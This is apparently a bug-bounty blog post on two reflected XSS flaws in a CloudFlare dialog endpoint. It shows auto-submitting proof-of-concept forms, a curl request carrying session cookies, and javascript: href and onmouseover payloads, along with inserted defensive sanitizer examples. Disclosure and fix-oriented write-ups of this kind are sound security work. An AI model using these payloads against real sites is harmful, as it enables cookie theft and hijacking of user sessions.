XSS in CloudFlare

#1 XSS

These are some of the duplicate vulnerabilities I have found; I thought I would share them with you. Recently I found two POST-based XSS issues in CloudFlare, but unfortunately I was not the first to report them.
I found the first issue in the “Confirm Key Generator” dialog box.

Let’s have a closer look at the URL.

/ajax/model-dialog.htm

It seems that an XMLHttpRequest object is used on the client side, and the server side accepts our POST request.

After playing around with the "content=" parameter, what I noticed was that it filters all HTML tags except
[code language="html"]
<b></b> <p></p><A HREF="">
[/code]

Since the <A HREF> tag is not filtered, we can easily execute JavaScript through a javascript: URL in the href:
[code language="html"]
<A HREF="javascript:alert(document.cookie);">XSS</A>
[/code]
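As an added example (not CloudFlare's code, and not from the original post), the block below reproduces the filter behaviour described above in a toy tag-allowlist sanitizer and shows the fix a defender would apply: keeping `<a>` is fine, but its `href` must be checked against an allowlist of URL schemes after normalizing it the way a browser does. The tag names, the allowed scheme set and the sample input are assumptions constructed for this demonstration; a real deployment should use a maintained HTML sanitizer rather than this regex tokenizer.

```javascript
// Added example (not CloudFlare's code): a toy tag-allowlist filter that
// keeps <b>, <p> and <a href> (the behaviour the post observed) and a
// corrected href check that rejects non-allowlisted URL schemes.
// A real deployment should use a maintained HTML sanitizer (e.g. DOMPurify);
// the regex tokenizer here is only for illustration.

const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]); // assumed allowlist

// Approximate what a browser does before reading the scheme: decode entity
// forms of characters, drop ASCII control characters and whitespace, lowercase.
function normalizeHref(href) {
  const decoded = href
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&amp;/gi, "&").replace(/&quot;/gi, '"')
    .replace(/&lt;/gi, "<").replace(/&gt;/gi, ">");
  return decoded.replace(/[\u0000-\u0020\u007f]/g, "").toLowerCase();
}

// Relative URLs are allowed; absolute URLs must use an allowlisted scheme.
function isSafeHref(href) {
  const m = normalizeHref(href).match(/^([a-z][a-z0-9+.-]*:)/);
  return m === null || ALLOWED_SCHEMES.has(m[1]);
}

// Attribute-context encoder for the href we re-emit.
function escapeAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

const TAG_RE = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
const HREF_RE = /\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;

// checkHref=false reproduces the flaw (any href survives); true is the fix.
function sanitizeContent(input, { checkHref }) {
  return input.replace(TAG_RE, (tag, name, attrs) => {
    const lname = name.toLowerCase();
    const closing = tag.startsWith("</");
    if (lname === "b" || lname === "p") return closing ? `</${lname}>` : `<${lname}>`;
    if (lname !== "a") return "";               // every other tag is stripped
    if (closing) return "</a>";
    const m = attrs.match(HREF_RE);
    const href = m ? (m[1] ?? m[2] ?? m[3]) : "";
    if (!m || (checkHref && !isSafeHref(href))) return "<a>"; // drop unsafe href
    return `<a href="${escapeAttr(href)}">`;    // all other attributes dropped
  });
}

// Constructed sample input modelled on the payload in the post.
const SAMPLE = 'Go to this link <A HREF="javascript:alert(document.cookie)">XSS</A> <img src=x onerror=alert(1)>';

// Returns both outputs so the difference is visible side by side.
function demo() {
  return {
    flawed: sanitizeContent(SAMPLE, { checkHref: false }),
    fixed: sanitizeContent(SAMPLE, { checkHref: true }),
  };
}

console.log(demo());
```

With `checkHref: false` the `<img>` tag is stripped but the `javascript:` link survives, which is exactly the behaviour the post exploits; with `checkHref: true` the anchor is kept as plain `<a>` text. The normalization step matters because the scheme check is applied to what the browser will see, not to the raw bytes.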

So the proof of concept would be:
[code language="html"]
<html>
<!-- POC by Osanda -->
<body>
<form name="exploit" action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
<input type="hidden" name="type" value="default" />
<input type="hidden" name="content" value="Go to this link &lt;A HREF=&quot;javascript:prompt(&apos;XSS by Osanda&apos;);&quot;&gt;XSS&lt;/A&gt;" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
[/code]

We don't need an authorized account to trigger the XSS, since the issue is in "model-dialog.htm". Here is the curl command:
[code language="bash"]
curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: https://www.cloudflare.com/my-account' \
-b '__cfduid=dcfb031f1436b2c98ee75cfda0b313f9b1395243158470; __utma=1.1850105675.1399902759.1399910158.1400126593.4; __utmz=1.1399902759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.7.10.1400126593; __utmc=1; vses2=9pvibldsqecve4b63ef9h13h75; __cf_effload=1' \
--data-binary $'type=default&content=Go to this link <A HREF=\"javascript:prompt(\'XSS by Osanda\');\">XSS</A>' \
'https://www.cloudflare.com/ajax/modal-dialog.html'
[/code]

That is it, game over 🙂

#2 XSS

The second XSS issue was in the "zoneupload" parameter in the "model-dialog.html" file. In the previous scenario all the HTML tags were truncated, but here they are converted into special characters instead. How to bypass this one? 😉

Well, as usual, "'() are not filtered 🙂
[code language="html"]
ABC" onmouseover="prompt('XSS by Osanda') ""
[/code]

Here is the proof of concept:
[code language="html"]
<html>
<body>
<form action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
<input type="hidden" name="type" value="zoneupload" />
<input type="hidden" name="z" value="google.lk" />
<input type="hidden" name="target" value="ABC&quot; onmouseover=&quot;prompt(&apos;XSS by Osanda&apos;) &quot;&quot;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
[/code]
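As an added example (not CloudFlare's code, and not from the original post), the block below shows why the second filter fails: encoding only `<`, `>` and `&` stops a new tag from being injected, but a value reflected inside an attribute can still close the quote and add an event handler. Attribute-context encoding, which also encodes `"` and `'`, keeps the value inert while preserving it for the user. The `<input>` template standing in for the dialog markup and the toy attribute parser are assumptions constructed for this demonstration; the payload is the one from the post.

```javascript
// Added example (not CloudFlare's code): what the second filter appears to
// do (encode angle brackets only) versus attribute-context encoding, which
// also encodes quotes so a reflected value cannot break out of its attribute.

// Incomplete encoder: tags can no longer be injected, but quotes pass through.
function encodeTagsOnly(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Attribute-context encoder: also neutralizes both quote characters.
const ATTR_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function encodeForAttribute(s) {
  return s.replace(/[&<>"']/g, (c) => ATTR_MAP[c]);
}

// Decoder used by the parser below, so the round trip of the value is visible.
const DECODE_MAP = { "&amp;": "&", "&lt;": "<", "&gt;": ">", "&quot;": '"', "&#39;": "'" };
function decodeEntities(s) {
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (m) => DECODE_MAP[m]);
}

// Constructed template standing in for the dialog markup that reflects "target".
function renderTargetInput(target, encode) {
  return `<input type="text" name="target" value="${encode(target)}">`;
}

// Toy parser for double-quoted attributes: returns { name: decodedValue }.
// It models how a browser would split the rendered tag into attributes.
function parseAttributes(html) {
  const attrs = {};
  const re = /([a-zA-Z][\w-]*)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = re.exec(html)) !== null) attrs[m[1].toLowerCase()] = decodeEntities(m[2]);
  return attrs;
}

// True if any attribute the browser would see is an on* event handler.
function hasEventHandler(html) {
  return Object.keys(parseAttributes(html)).some((n) => n.startsWith("on"));
}

// The payload from the post, reflected through each encoder.
const PAYLOAD = 'ABC" onmouseover="prompt(\'XSS by Osanda\') ""';

function demo() {
  const flawed = renderTargetInput(PAYLOAD, encodeTagsOnly);
  const fixed = renderTargetInput(PAYLOAD, encodeForAttribute);
  return {
    flawedHasHandler: hasEventHandler(flawed), // true: the value escaped its attribute
    fixedHasHandler: hasEventHandler(fixed),   // false: it stays a plain string
    fixedValue: parseAttributes(fixed).value,  // the user's text, unchanged
  };
}

console.log(demo());
```

The point of `fixedValue` is that proper encoding is not a loss of functionality: the browser decodes the entities back to the original string inside the attribute, so a user who genuinely typed quotes still gets them. Only the parse of the surrounding markup changes.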

So yeah, here we go, XSS again 😀

Bug hunting is not all about getting your name in halls of fame, receiving rewards or being the first to report. I just enjoy finding vulnerabilities and love learning something new 🙂
